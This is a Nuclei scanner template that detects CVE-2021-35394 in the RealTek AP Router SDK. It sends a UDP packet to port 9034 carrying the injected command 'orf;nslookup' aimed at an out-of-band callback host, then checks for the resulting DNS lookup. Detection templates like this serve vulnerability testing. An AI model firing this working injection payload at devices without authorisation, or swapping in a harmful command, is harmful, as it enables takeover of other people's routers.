id: CVE-2021-35394

info:
  name: RealTek AP Router SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  remediation: Apply the latest security patches or updates provided by RealTek.
  description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
  tags: cve,cve2021,realtek,rce,kev

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      let message = `orf;nslookup ${OAST}`
      let data = message;
      packet.WriteString(data)
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());

    args:
      Host: "{{Host}}"
      Port: 9034
      OAST: "{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a0046304402202653f3caae379b8d6253e7b31c2627077a285c4345b3ebbb678cd447fd7b398f022041cb6f9a7593d51271e193d8fd866e6d948bc7b3f88115b07c5b12dceeb158d6:922c64590222798bb761d5b6d8e72950